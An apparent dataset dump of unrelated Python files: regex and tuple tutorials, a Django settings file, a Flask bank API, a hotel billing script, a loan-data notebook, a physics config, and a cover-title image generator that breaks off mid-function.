text stringlengths 38 1.54M |
|---|
"""
案例1
#导入相关的包、
import re
#查找相关的数字
#r表示字符串不转义
pattern=re.compile(r'\d+')
#在字符串"123one789two"中按照pattern指定的正则进行查找
match=pattern.match("123one789two")
print(match)
"""
"""
#案例2
#导入相关的包、
import re
#查找相关的数字
#r表示字符串不转义
pattern=re.compile(r'\d+')
#在字符串"123one789two"中按照pattern指定的正则进行查找
#后边的参数0,10表示查找的范围
match=pattern.match("123one789two",0,10)
print(match)
#start
print(match.start(0))
#end
print(match.end(0))
#上述代码说明的问题
#1.match可以输入参数表示想要查找的起始位置
#2.查找到的结果只包含一个,表示第一次进行匹配成功的内容
"""
#案例三
import re
# I表示忽略掉大小写
#下边的相当于分两个组,两组之间必须空开,([a-z]+) ([a-z]+)是一个整体,满足这两个的话打印出来,
# 例如”I am yang ming“,会打印出来“I am”
p=re.compile(r'([a-z]+) ([a-z]+)',re.I)
m=p.match("I aam EROMAN niiu")
print(m)
#下边三个表示整个匹配到的字符串
print(m.group(0))
print(m.start(0))
print(m.end(0))
#下边三个表示第一组的内容和起始的位置
print(m.group(1))
print(m.start(1))
print(m.end(1))
#下边表示将所有的组表示出来
print(m.groups())
|
import os
import sys
import unittest
from pkg_resources import resource_string
from scoville.circuit import Circuit
from scoville.eagleSchematic import EagleSchematic
from scoville.parts import GenericVoltageSource
from unitTests import test_AND, test_OR, test_NAND, test_NOT, test_XOR, test_OneBitSelect, test_ThreeBitSelect
def getCircuitFunction(schematicFileName, supplyName):
def getCircuit(self):
schematicSource = resource_string('hw', schematicFileName)
schematic = EagleSchematic(schematicSource)
circuit = Circuit(schematic.getSpiceData())
circuit.setSignal(GenericVoltageSource(supplyName, '_VP', '_VN', 5.0))
return circuit
return getCircuit
def runTests(schematicFileName, testClass):
testClass.supplyName = 'Vsupply'
testClass.getCircuit = getCircuitFunction(schematicFileName, 'supply')
tests = unittest.TestLoader().loadTestsFromTestCase(testClass)
return unittest.TextTestRunner(verbosity=2).run(tests).wasSuccessful()
if __name__ == '__main__':
sys.path.insert(0, os.getcwd())
success = True
success = success and runTests('singleGates/AND.sch', test_AND.ANDUnitTests)
success = success and runTests('singleGates/OR.sch', test_OR.ORUnitTests)
success = success and runTests('singleGates/NAND.sch', test_NAND.NANDUnitTests)
success = success and runTests('singleGates/NOT-A.sch', test_NOT.NOTUnitTests)
success = success and runTests('singleGates/NOT-B.sch', test_NOT.NOTUnitTests)
success = success and runTests('singleGates/XOR.sch', test_XOR.XORUnitTests)
success = success and runTests('singleGates/1-BitSelect.sch', test_OneBitSelect.OneBitSelectUnitTests)
success = success and runTests('singleGates/3-BitSelect.sch', test_ThreeBitSelect.ThreeBitSelectUnitTests)
sys.exit(not success)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'petro-ew'
"""
35. Написать функцию, получающую в качестве аргумента целое число x,
и возвращающую строковое представление x в двоичной системе счисления.
"""
x = 56
def funcz(x):
return "{0:b}".format(x)
print(funcz(x))#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'petro-ew'
"""
35. Написать функцию, получающую в качестве аргумента целое число x,
и возвращающую строковое представление x в двоичной системе счисления.
"""
x = 56
def funcz(x):
return "{0:b}".format(x)
print(funcz(x)) |
import os
from global_settings import *
try:
from local_settings import *
from local_settings_secret import *
except ImportError:
import warnings
warnings.warn('Local settings have not been found (src.conf.local_settings). Trying to import Heroku config...')
try:
from local_settings_heroku import *
from local_settings_heroku_secret import *
warnings.warn('Local Heroku config loaded')
except ImportError:
warnings.warn('Heroku local settings not found neither (src.conf.local_settings_heroku)')
# FORCE_SCRIPT_NAME overrides the interpreted 'SCRIPT_NAME' provided by the
# web server. since the URLs below are used for various purposes outside of
# the WSGI application (static and media files), these need to be updated to
# reflect this alteration
if FORCE_SCRIPT_NAME:
ADMIN_MEDIA_PREFIX = os.path.join(FORCE_SCRIPT_NAME, ADMIN_MEDIA_PREFIX[1:])
STATIC_URL = os.path.join(FORCE_SCRIPT_NAME, STATIC_URL[1:])
MEDIA_URL = os.path.join(FORCE_SCRIPT_NAME, MEDIA_URL[1:])
LOGIN_URL = os.path.join(FORCE_SCRIPT_NAME, LOGIN_URL[1:])
LOGOUT_URL = os.path.join(FORCE_SCRIPT_NAME, LOGOUT_URL[1:])
LOGIN_REDIRECT_URL = os.path.join(FORCE_SCRIPT_NAME, LOGIN_REDIRECT_URL[1:])
# This is used as a "seed" for various hashing algorithms. This must be set to
# a very long random string (40+ characters)
SECRET_KEY = 'read from secret settings'
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static asset configuration
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_PATH, '_site/static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
|
from utils import json_serialize
from flask_restful import Resource, reqparse
from app import db
from models import Bank, BankBranch, Staff, User
_bank_parser = reqparse.RequestParser()
_bank_parser.add_argument(name="name", type=str, required=True, help="No Bank Name Provided", location="json")
class BankListApi(Resource):
"""API Endpoint for accessing all banks and for adding new banks
"""
def get(self):
"""API Endpoint for getting all banks"""
return json_serialize(Bank.query.all())
def put(self):
"""API Endpoint for creating new bank
"""
args = _bank_parser.parse_args()
bank = Bank(name=args['name'])
db.session.add(bank)
db.session.commit()
return json_serialize(bank)
class BankApi(Resource):
"""API Endpoint for interacting with specific banks
"""
def get(self, bank_id):
"""API Endpoint for getting individual bank
"""
return json_serialize(Bank.query.get_or_404(bank_id))
def post(self, bank_id):
"""API Endpoint for changing bank instance data
"""
args = _bank_parser.parse_args()
bank = Bank.query.get_or_404(bank_id)
bank.update(args)
db.session.commit()
return json_serialize(bank)
def delete(self, bank_id):
"""API Endpoint for Deleting bank instance
"""
bank = Bank.query.get_or_404(bank_id)
db.session.delete(bank)
db.session.commit()
return json_serialize(bank)
_branch_parser = reqparse.RequestParser()
_branch_parser.add_argument(name="name", type=str, required=True, help="No Branch Name Provided", location="json")
class BranchListApi(Resource):
"""API Endpoint for interacting with all bank branches at a specific bank
"""
def get(self, bank_id):
"""API Endpoint for getting all branches for a given bank
"""
bank = Bank.query.get_or_404(bank_id)
branches = BankBranch.query.filter_by(bank=bank).all()
return json_serialize(branches)
def put(self, bank_id):
"""API Endpoint for adding a branch to a given bank
"""
args = _branch_parser.parse_args()
bank = Bank.query.get_or_404(bank_id)
branch = BankBranch(name=args['name'], bank=bank)
db.session.add(branch)
db.session.commit()
return json_serialize(branch)
class BranchApi(Resource):
"""API Endpoint for interacting with all bank branches at a specific bank.
"""
def get(self, bank_id, branch_id):
"""API Endpoint for getting branch instance
"""
bank = Bank.query.get_or_404(bank_id)
branch = BankBranch.query.filter_by(bank=bank, id=branch_id).first_or_404()
return json_serialize(branch)
def post(self, bank_id, branch_id):
"""API Endpoint for modifying branch instance
"""
args = _branch_parser.parse_args()
bank = Bank.query.get_or_404(bank_id)
branch = BankBranch.query.filter_by(bank=bank, id=branch_id).first_or_404()
branch.update(args)
db.session.commit()
return json_serialize(branch)
def delete(self, bank_id, branch_id):
"""API Endpoint for deleting branch instance
"""
bank = Bank.query.get_or_404(bank_id)
branch = BankBranch.query.filter_by(bank=bank, id=branch_id).first_or_404()
db.session.delete(branch)
db.session.commit()
return json_serialize(branch)
_staff_create_parser = reqparse.RequestParser()
_staff_create_parser.add_argument("user_id", type=int, required=True, help="No User Id Provided", location="json")
_staff_create_parser.add_argument("role", type=int, required=True, help="No Role Provided", location="json")
class StaffListApi(Resource):
"""API Endpoint for getting and adding staff at a given bank branch
"""
def get(self, bank_id, branch_id):
"""API Endpoint for getting all staff for a branch instance
"""
bank = Bank.query.get_or_404(bank_id)
branch = BankBranch.query.filter_by(bank=bank, id=branch_id).first_or_404()
staff = branch.staff
return json_serialize(staff)
def put(self, bank_id, branch_id):
"""API Endpoint for adding staff to a branch instance
"""
args = _staff_create_parser.parse_args()
bank = Bank.query.get_or_404(bank_id)
branch = BankBranch.query.filter_by(bank=bank, id=branch_id).first_or_404()
user = User.query.get_or_404(args['user_id'])
staff = Staff(branch=branch, user=user, role=args['role'])
user.staff = staff
db.session.add(staff)
db.session.commit()
return json_serialize(staff)
_staff_update_parser = reqparse.RequestParser()
_staff_update_parser.add_argument("role", type=int, required=True, help="No Role Provided", location="json")
class StaffApi(Resource):
"""API Endpoint for managing staff instances
"""
def get(self, bank_id, branch_id, staff_id):
"""API Endpoint for getting staff instance
"""
staff = Staff.query.get_or_404(staff_id)
return json_serialize(staff)
def post(self, bank_id, branch_id, staff_id):
"""API Endpoint for updating staff instance
"""
args = _staff_update_parser.parse_args()
staff = Staff.query.get_or_404(staff_id)
staff.update(args)
db.session.commit()
return json_serialize(staff)
def delete(self, bank_id, branch_id, staff_id):
"""API Endpoint for deleting staff instance
"""
staff = Staff.query.get_or_404(staff_id)
db.session.delete(staff)
db.session.commit()
return json_serialize(staff)
|
"""
Customer Name
Contact
ID
Date
Days
room
rent =1000
tot =rent*days*rooms
0 - 5 = 5%
5 - 10 = 10%
10 - 15 = 15%
more than 15 = 20%
"""
name = input("Enter Customer Name : ")
contact = input("Enter Contact Number : ")
Id = input("Enter ID Number : ")
date = input("Enter Date of Booking : ")
days = int(input("Enter Number of Days : "))
rooms = int(input("Enter Number of rooms : "))
rent = 1000
tot = rent*days*rooms
if(days>0 and days<=5):
dis = tot*0.05
net = tot-dis
elif(days>5 and days<=10):
dis = tot*0.1
net = tot-dis
elif(days>10 and days<=15):
dis = tot*0.15
net = tot-dis
else:
dis = tot*0.2
net = tot-dis
print("******* Billing Information ********")
print("Customer Name : ",name)
print("Contact Number : ",contact)
print("ID Number : ",Id)
print("Date : ",date)
print("No.of.Days : ",days)
print("No.of.rooms : ",rooms)
print("Total Amount : ",tot)
print("Discount : ",dis)
print("Net Pay : ",net)
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
get_ipython().run_line_magic('matplotlib', 'inline')
# In[3]:
df=pd.read_csv('loan_data.csv')
# In[4]:
df.head()
# In[5]:
fig=sns.pairplot(df)
# In[9]:
fig.savefig('pairplots2.jpg')
# In[12]:
df['purpose'].unique()
# In[15]:
df
# In[21]:
fig=df[df['credit.policy']==1]['fico'].hist(label='Credit_policy=1',alpha=0.6)
fig=df[df['credit.policy']==0]['fico'].hist(label='Credit_policy=0',alpha=0.6)
plt.legend()
# In[22]:
fig=df[df['not.fully.paid']==1]['fico'].hist(label='Not Fully Paid=1',alpha=0.6)
fig=df[df['not.fully.paid']==0]['fico'].hist(label='Not Fully Paid=0',alpha=0.6)
plt.legend()
# In[28]:
plt.figure(figsize=(11,8))
fig=sns.countplot(x='purpose',data=df,hue='not.fully.paid')
# In[29]:
sns.jointplot(x='fico',y='int.rate',data=df)
# In[32]:
#creating dummies for catagorical data i.e purpose
# In[33]:
cf=['purpose']
# In[34]:
final_data=pd.get_dummies(df,columns=cf,drop_first=True)
# In[35]:
final_data.head()
# In[36]:
#train test split the data
# In[39]:
x=final_data.drop('not.fully.paid',axis=1)
y=final_data['not.fully.paid']
# In[40]:
from sklearn.model_selection import train_test_split
# In[41]:
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.5)
# In[42]:
#set the model using decision tree
# In[43]:
from sklearn.tree import DecisionTreeClassifier
# In[44]:
dtc=DecisionTreeClassifier()
# In[45]:
dtc.fit(x_train,y_train)
# In[46]:
pred1=dtc.predict(x_test)
# In[47]:
pred1
# In[48]:
#evaluate data
# In[49]:
from sklearn.metrics import confusion_matrix,classification_report
# In[53]:
print(confusion_matrix(y_test,pred1))
print()
print(classification_report(y_test,pred1))
# In[55]:
sns.lineplot(y_test,pred1)
# In[52]:
#now using random forest with n_estimator as 500
# In[56]:
from sklearn.ensemble import RandomForestClassifier
# In[63]:
rfc=RandomForestClassifier(n_estimators=500)
# In[64]:
rfc.fit(x_train,y_train)
# In[65]:
pred2=rfc.predict(x_test)
# In[66]:
pred2
# In[61]:
#evaluate data
# In[67]:
print(confusion_matrix(y_test,pred2))
print()
print(classification_report(y_test,pred2))
# In[68]:
sns.lineplot(y_test,pred2)
# In[69]:
#comparison
# In[74]:
sns.lineplot(pred1,pred2)
# In[ ]:
#the end
|
import FWCore.ParameterSet.Config as cms
from EventFilter.CSCRawToDigi.cscDigiFilterDef_cfi import cscDigiFilterDef
def appendCSCChamberMaskerAtUnpacking(process):
if hasattr(process,'muonCSCDigis') :
# clone the original producer
process.preCSCDigis = process.muonCSCDigis.clone()
# now apply the filter
process.muonCSCDigis = cscDigiFilterDef.clone(
stripDigiTag = "preCSCDigis:MuonCSCStripDigi",
wireDigiTag = "preCSCDigis:MuonCSCWireDigi",
comparatorDigiTag = "preCSCDigis:MuonCSCComparatorDigi",
alctDigiTag = "preCSCDigis:MuonCSCALCTDigi",
clctDigiTag = "preCSCDigis:MuonCSCCLCTDigi",
lctDigiTag = "preCSCDigis:MuonCSCCorrelatedLCTDigi",
showerDigiTag = "preCSCDigis:MuonCSCShowerDigi",
gemPadClusterDigiTag = "preCSCDigis:MuonGEMPadDigiCluster",
maskedChambers = [],
selectedChambers = []
)
process.RawToDigiTask.add(process.preCSCDigis)
return process
def maskExperimentalME11ChambersRun2(process):
process = appendCSCChamberMaskerAtUnpacking(process)
# these 3 chambers had Phase-2 firmware loaded partially during Run-2
process.muonCSCDigis.maskedChambers = [
"ME+1/1/9", "ME+1/1/10", "ME+1/1/11"]
|
# Tuples su coleciton data tipovi koji su ordered i immutable, mogu duplikati elemenata
# slicno listi ali ne moze da se menja nakon sto se napravi
# ne moze sort, reverse
# cesto se koristi za objekte koji pripadaju zajedno
# ()
# zagrade nisu obavezne
mytuple = ("Vika", 28, "Beograd")
print(mytuple)
# ako ima samo jedan element, ne prepoznaje ga kao tupl
mytuple1 = ("Vile")
print(type(mytuple1))
# prepoznaje ga kao string, onda se doda , na kraj
mytuple1 = ("Vile",)
print(type(mytuple1))
# tupl moze da se stvori preko tupl funkcije, da se stvori od iteratora
# npr liste
mytuple = tuple(["Vika", 29, "Ulica"])
print(mytuple)
# pristup elementima preko indeksa
item = mytuple[0]
print(item)
# -1 poslednji element, -2 pretposlednji itd
# ako hocemo da menjamo elemente
#mytuple[0] = "Tima"
print(mytuple)
# ovo je nemoguce, jer je tupl immutable
# lupovanje
for i in mytuple:
print(i)
# proverimo dal je item u listi
if "la" in mytuple:
print("yes")
else:
print("no")
# koliko je elemenata u listi
print(len(mytuple))
# za brojanje
print(mytuple.count('V'))
# za indeks elementa
print(mytuple.index(29))
# konvertovanje tupla u listu i obrnuto
myList = list(mytuple)
print(myList)
mytuple2 = tuple(myList)
print(mytuple2)
# slicing - da pristupimo delovima tupla sa :
a = (1,2,3,4,5,6)
b = a[2:5]
print(b)
# bez prvog ide od pocetka, ako ne odredimo stop ide do kraja
# npr :5 od pocetka, 1: ide do kraja
# optional step indeks [::1] - uzme svaki item,
# [::2] - uzme svaki drugi item
# [::-1] - da se obrne tupl
# unpacking
my_tuple = "Max", 28, "Pariz"
name, age, city = my_tuple
print(age)
print(name)
print(city)
# mora da se poklapa broj sa elemntima u tuplu
# unpack vise elemenata sa *
my_tuple = (0,1,2,3,4)
#i1, *i2, i3 = my_tuple -> ovo kaze da ne valja
#print(i1)
#print(i3)
#print(i2) #svi elementi izmedju 1 i 3, sada pretvoreni u listu
# poredjenje tupla i liste, lista je veca
# sa import sys, i getsizeof metodom
import sys
my_list = [0,1,2,"cao"]
my_tuplee = (0,1,2,"cao")
print(sys.getsizeof(my_list),"bytes")
print(sys.getsizeof(my_tuplee),"bytes")
# poredjenje vremena sa timeit modulom
# brzi su tupls, tj efikasniji su od liste
import timeit
print(timeit.timeit(stmt="[0,1,2,3,4]",number=1000000))
print(timeit.timeit(stmt="(0,1,2,3,4)",number=1000000))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Text-to-Image module
import os, sys, time
from PIL import Image, ImageDraw, ImageFont
from random import *
from util import *
from title.titletemplates import *
from title.bgprofiles import *
from title.generators import Generator
import title.util as titutil
COVER_PATH = "title/resources/cover_images/"
FONT_PATH = "title/resources/fonts/"
PATCH_PATH = "title/resources/"
MAX_IMG_NUM = 24
RESOLUTION = 4.167
LOWERTITLETEXTBOUND = 527
MAXWIDTH = 910
MINFONTSIZE = 12
XOFFSET = int(round((971 - MAXWIDTH) / 2))
AUTHORNAME_YOFFSET = 560
MINSPACERHEIGHT = 13
VERT_SEP_PROP = 2 # proportion of text height to use as
# separator between two lines of the
# the same type
BGImgQ = HistoryQ(iQSize = 5)
def RGBtoHex(sRGBcode):
return '#%02x%02x%02x' % sRGBcode
def CalcTextSizeScore(sText):
dScore = 0.0
# = (Char Count /4) +(Upper Case Num + Avg Word Size)+(- White Spaces)
# > 23 needs larger template
iCharCount = len(sText)
words = re.findall(r"[\w']+", sText)
iNumWords = len(words)
dAvgWordLen = len(sText)/iNumWords
iWhiteSpaceChars = len(words) - 1
iUpperCaseChars = 0
for c in sText:
if c.isupper():
iUpperCaseChars = iUpperCaseChars + 1
dScore = (iCharCount/4) + (iUpperCaseChars + dAvgWordLen) + (-1 * iWhiteSpaceChars)
return dScore
def GetBGImg(sFileName):
BGImg = None
try:
BGImg = Image.open(COVER_PATH + sFileName).convert('RGBA')
except IOError as e:
print("***ERROR***\nGetBGImg() Failed to open file " + COVER_PATH + sFileName + ":\n" + e.strerror)
return BGImg
class BGImageHH:
TitleBoxTop_yOffset = 210
TitleBoxBottom_yOffset = 525
FileSuffix = "hh"
def __init__(self, BGProfile):
self.MaxHeight = self.TitleBoxBottom_yOffset - self.TitleBoxTop_yOffset
self.FileName = BGProfile.FileName + "_hh.jpg"
self.Image = GetBGImg(self.FileName)
class BGImagePH:
TitleBoxTop_yOffset = 118
TitleBoxBottom_yOffset = 525
FileSuffix = "hh"
def __init__(self, BGProfile):
self.MaxHeight = self.TitleBoxBottom_yOffset - self.TitleBoxTop_yOffset
self.FileName = BGProfile.FileName + "_ph.jpg"
self.Image = GetBGImg(self.FileName)
def GetTextLineSize(font, sLine):
width, height = (0,0)
off_width, off_height = (0,0)
width, height = font.getsize(sLine)
off_width, off_height = font.getoffset(sLine)
width = width + off_width
height = height - off_height
return width, height
def CalcMinSpacerHeight(TitleBoxes):
iMinSpacerHeight = 0
aDescenderHeights = []
iLastDescender = 0
if len(TitleBoxes) > 2:
for boxno, box in enumerate(TitleBoxes):
(ascender, descender) = box.Font.getmetrics()
(ascender, descender) = (ascender * (box.SpacerPercent * .1), descender * (box.SpacerPercent * .1))
# first title line, ignore descender
if boxno == 0:
pass
else:
aDescenderHeights.append(descender)
if len(aDescenderHeights) > 1:
iMinSpacerHeight = sorted(aDescenderHeights)[-2]
elif len(TitleBoxes) == 2:
iLine1Descender = TitleBoxes[0].Font.getmetrics()[1]
iLine2Ascender = TitleBoxes[1].Font.getmetrics()[0]
if iLine1Descender > iLine2Ascender:
iMinSpacerHeight = iLine2Ascender
else:
iMinSpacerHeight = iLine1Descender
else:
iMinSpacerHeight = 0
iMaxSpacerHeight = CalcMaxSpacerHeight(TitleBoxes)
if iMinSpacerHeight > iMaxSpacerHeight:
iMinSpacerHeight = iMaxSpacerHeight
return round(iMinSpacerHeight, 2)
def CalcMaxSpacerHeight(TitleBoxes):
iMaxSpacerHeight = 0
for boxno, box in enumerate(TitleBoxes):
if boxno == 0:
iMaxSpacerHeight = box.Height
else:
if box.Height > iMaxSpacerHeight:
iMaxSpacerHeight = box.Height
return iMaxSpacerHeight
class LineOfText():
def __init__(self, sText = "", iOrderNo = 0, iHeight = 0, iWidth = 0):
self.Text = sText
self.OrderNo = iOrderNo
self.StartXY = (0, 0)
self.Height = iHeight
self.Width = iWidth
def WrapText(sText, font, max_line_width):
# break string into multiple lines that fit max_line_width
# and return an array of strings
Lines = []
iNumLines = 0
iLastWhtSpc = 0
iSubStart = 0
sLineSoFar = ""
sLastValidLine = ""
for charno, char in enumerate(sText):
if char.isspace() or char == "-":
iLastWhtSpc = charno
sLastValidLine = sText[iSubStart:iLastWhtSpc]
sLineSoFar += char
# if character is a line break or line is longer than max
# width
if not len(sLineSoFar) == 0 and \
(char == "\n" or \
font.getsize(sLineSoFar)[0] >= max_line_width):
# if there is no recent whitespace char but we are past
# the max width, split the middle
if iLastWhtSpc < iSubStart:
iLastWhtSpc = int((charno - iSubStart)/2)
sLastValidLine = sText[iSubStart:iLastWhtSpc]
# add the last valid text as a new line
Lines.append(LineOfText(sLastValidLine, len(Lines) + 1))
# move substring start forward and reset substring values
iSubStart = iLastWhtSpc + 1
sLastValidLine = ""
sLineSoFar = sText[iSubStart:charno + 1]
Lines.append(LineOfText(sLineSoFar, len(Lines) + 1))
return Lines
def CalcBoxHeight(sFontName, iMaxFontSize, iMaxRows, Color = (0,0,0,255)):
iBoxHeight = 0
try:
Font = ImageFont.truetype(FONT_PATH + sFontName, size = iMaxFontSize, index = 0)
iLineHeight = GetTextLineSize(Font,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")[1]
iBoxHeight = (iLineHeight * iMaxRows) + (int(round(iLineHeight/VERT_SEP_PROP)) * (iMaxRows - 1))
except OSError as e:
print("**ERROR** CalcBoxHeight() failed to open font file " + FONT_PATH + sFontName + ". OSError: " + str(e))
return iBoxHeight
class TitleSection:
def __init__(self,
sText = "",
sFontName = "",
iFontSize = 10,
iMaxRows = 1,
Color = (0,0,0,255)):
self.Text = sText
self.FontName = sFontName
self.FontFileName = FONT_PATH + self.FontName
self.FontSize = iFontSize
self.AdjFontSize = round(int(self.FontSize * RESOLUTION))
self.MaxRows = iMaxRows
self.Color = Color
self.BoundingBoxWidth = MAXWIDTH
self.BoundingBoxHeight = CalcBoxHeight(self.FontName, self.AdjFontSize, self.MaxRows)
self.TotLineHeight = 0
self.DecreaseSizeBy = 3
self.VertSepProp = 4
self.TotalLineSpace = self.BoundingBoxHeight
self.SpacerPercent = 10
self.Height = 0
self.Width = 0
self.LineSpace = 0
self.Lines = []
self.SetFont()
# shrink font until lines do not exceed bounding text box's height
iLoopCount = 1
while not self.FitTextToBox():
self.FontSize = iFontSize + (self.DecreaseSizeBy * (-1 * iLoopCount))
self.AdjFontSize = round(int(self.FontSize * RESOLUTION))
self.MaxRows += 1
self.BoundingBoxHeight = CalcBoxHeight(self.FontName, self.AdjFontSize, self.MaxRows)
self.SetFont()
iLoopCount += 1
def CalcTotLineHeight(self):
iHeight = 0
for line in self.Lines:
if line.Text.isspace() or line.Text == "":
iHeight += GetTextLineSize(self.Font, "a")[1] / 2
else:
iHeight += GetTextLineSize(self.Font, line.Text)[1]
return iHeight
def FitTextToBox(self):
bSuccess = True
# wrap the text based on the bounding text box's width
self.Lines = WrapText(self.Text, self.Font, self.BoundingBoxWidth)
# calculate the height of the text
self.TotLineHeight = self.CalcTotLineHeight()
while self.TotLineHeight > self.BoundingBoxHeight or len(self.Lines) > self.MaxRows:
self.FontSize = (self.FontSize + (self.DecreaseSizeBy * (-1)))
if self.FontSize < MINFONTSIZE:
bSuccess = False
break
self.SetFont()
self.Lines = WrapText(self.Text, self.Font, self.BoundingBoxWidth)
self.TotLineHeight = self.CalcTotLineHeight()
return bSuccess
def SetFont(self):
#print(" - SetFont() for [" + self.Text + "]. Font is [" + self.FontName + "], size = " + str(self.FontSize))
try:
self.Font = ImageFont.truetype(FONT_PATH + self.FontName, size = round(int(self.FontSize * RESOLUTION)), index = 0)
except OSError as e:
print("**ERROR** SetFont() failed to open font file " + FONT_PATH + self.FontName + ". OSError: " + str(e))
def SetDimensions(self):
ImgTxt = None
# how much the text in the box is offset from the box
xOffset = 0 #.027
yOffset = 0 #.027
self.SetFont()
self.Height = 0
if len(self.Lines) > 1:
self.LineSpace = self.TotalLineSpace / (len(self.Lines) - 1)
else:
self.LineSpace = 0
ascender, descender = (0, 0)
pad_width, pad_height = (0, 0)
for iCount, line in enumerate(self.Lines):
start_x, start_y = (0,0)
adj_width, adj_height = (0, 0)
if line.Text.isspace() or line.Text == "":
adj_width, adj_height = GetTextLineSize(self.Font, "a")
adj_height = adj_height / 2
else:
ascender, descender = self.Font.getmetrics()
adj_width, adj_height = GetTextLineSize(self.Font, line.Text)
# for some reason Pillow will not start drawing the text at (0,0).
# you must specify (0, 0 - offset).
pad_width, pad_height = self.Font.getoffset(line.Text)
self.Height = self.Height - pad_height
# calculate top left corner (x,y) of text
start_x = ((self.BoundingBoxWidth - adj_width)/2)
start_y = (self.Height)
line.StartXY = (start_x, start_y)
self.Height = self.Height + ((ascender + descender) * self.SpacerPercent *.1)
if iCount < len(self.Lines) - 1:
self.Height = self.Height + int(round(descender * .4))
def DrawText(self, iTotalLineSpace = -1):
if iTotalLineSpace >= 0:
self.TotalLineSpace = iTotalLineSpace
self.SetDimensions()
def ShrinkText(self, iStep, iTotalLineSpace = -1):
bSuccess = False
if iTotalLineSpace >= 0:
self.TotalLineSpace = iTotalLineSpace
if self.FontSize - iStep > 0:
self.FontSize = self.FontSize - iStep
self.SetDimensions()
bSuccess = True
return bSuccess
def GrowText(self, iStep, iTotalLineSpace = -1):
bSuccess = False
if iTotalLineSpace >= 0:
self.TotalLineSpace = iTotalLineSpace
if self.FontSize + iStep < 1000:
self.FontSize = self.FontSize + iStep
self.SetDimensions()
bSuccess = True
return bSuccess
def ShrinkSpacer(self, iStep):
bSuccess = False
if self.SpacerPercent - iStep > 0:
self.SpacerPercent = self.SpacerPercent - iStep
self.SetDimensions()
bSuccess = True
return bSuccess
def DrawLines(self, draw, xOffset = 0, yOffset = 0):
for lineno, line in enumerate(self.Lines):
draw.text((line.StartXY[0] + xOffset, line.StartXY[1] + yOffset),
line.Text,
font = self.Font,
fill = self.Color)
# Calculate the total box height WITH or WITHOUT spaces
def CalcTotalBoxHeight(boxes, bNoSpaces = False):
iTotalBoxHeight = 0
iSpacerHeight = 0
if not bNoSpaces:
iSpacerHeight = CalcMinSpacerHeight(boxes)
for boxno, box in enumerate(boxes):
(ascender, descender) = box.Font.getmetrics()
iTotalBoxHeight = iTotalBoxHeight + box.Height
# first title line, ignore spacer
if boxno == 0:
pass
else:
iTotalBoxHeight = iTotalBoxHeight + iSpacerHeight
return round(iTotalBoxHeight, 2)
def CalcSpaceHeight(iMaxHeight, boxes):
iSpaceHeight = 0
iSpaceHeight = int((iMaxHeight - CalcTotalBoxHeight(boxes))/(len(boxes)))
return iSpaceHeight
def CreateImg(ImgTxtGen):
# create Image object with the input image
RGBImgOut = None
# get a random cover profile
if titutil.BGProfileQ is None:
titutil.BGProfileQ = HistoryQWithLog(titutil.BGPROFILEQ_FILENAME, titutil.BGPROFILEQ_SIZE)
BGProfile = PickBGProfile(ProfileHistoryQ = titutil.BGProfileQ,
ImgTxtGen = ImgTxtGen)
#print("BGProfile #" + str(BGProfile.ID) + " (" + BGProfile.FileName + ") selected")
sFileName = ""
# use to off-center horizontally.
width_offset = 17
if isinstance(ImgTxtGen, Generator):
TitleBoxes = []
#color and format title lines
for line in ImgTxtGen.Template.Lines:
if not line is None and len(line.LineText) > 0:
# draw title
Color = "rgba(0, 0, 0, 255)"
if line.ColorType == LineColorType.MainTitle:
Color = BGProfile.MainTitleColor
elif line.ColorType == LineColorType.SecondTitle:
Color = BGProfile.SecondTitleColor
elif line.ColorType == LineColorType.SmallText:
Color = BGProfile.SmallTextColor
elif line.ColorType == LineColorType.AuthorName:
Color = BGProfile.AuthorNameColor
section = TitleSection(line.LineText,
sFontName = line.FontName,
iFontSize = line.FontMaxSize,
iMaxRows = line.MaxRows,
Color = Color)
TitleBoxes.append(section)
# get bg image
bg = BGImageHH(BGProfile)
#init image objects
BGImg = bg.Image
if BGImg is not None:
# calculate vertical spacing of title bounded text boxes
xOffset = XOFFSET + width_offset
yOffset = bg.TitleBoxTop_yOffset
iTotalBoxHeight = 0
yLineSpace = 0
if len(TitleBoxes) > 0:
# draw the text boxes
for box in TitleBoxes:
box.SetDimensions()
# the minimum vert space height should be the
# height of the largest descender.
iMinSpacerHeight = CalcMinSpacerHeight(TitleBoxes)
# 1. Attempt to fit title sections at max font sizes
# 2. If title sections WITHOUT SPACES are > the regular
# template size, use plain header background
iTotalBoxHeight = CalcTotalBoxHeight(TitleBoxes)
iTotalBoxHeightNoSpaces = CalcTotalBoxHeight(TitleBoxes, bNoSpaces = False)
if iTotalBoxHeightNoSpaces > bg.MaxHeight + 50:
bg = BGImagePH(BGProfile)
BGImg = bg.Image
#print(" - Switched to plain header background.")
# 3. If title sections don't fit, EITHER:
# a. shrink all fonts by 1 and try again
# b. shrink spacers by 1 and try again
if iTotalBoxHeight > bg.MaxHeight:
bBreak = False
bEvenLoop = False
while iTotalBoxHeight > bg.MaxHeight:
if bEvenLoop:
bEvenLoop = False
# reduce font size
for box in TitleBoxes:
if not box.ShrinkText(1):
bBreak = True
break
else:
bEvenLoop = True
# reduce spacer size
for box in TitleBoxes:
if not box.ShrinkSpacer(1):
bBreak = True
break
if bBreak:
break
iTotalBoxHeight = CalcTotalBoxHeight(TitleBoxes)
iMinSpacerHeight = CalcMinSpacerHeight(TitleBoxes)
#calculate the starting height
draw = ImageDraw.Draw(BGImg)
iyOffsetLine = bg.TitleBoxTop_yOffset + int(round((bg.TitleBoxBottom_yOffset - bg.TitleBoxTop_yOffset - iTotalBoxHeight) / 2))
# draw the text boxes
for boxno, box in enumerate(TitleBoxes):
box.DrawLines(draw, xOffset, iyOffsetLine)
iyOffsetLine = iyOffsetLine + box.Height + iMinSpacerHeight
# draw author name
AuthorTemplate = ImgTxtGen.Template.AuthorLine
AuthorNameSection = TitleSection(ImgTxtGen.AuthorName,
sFontName = AuthorTemplate.FontName,
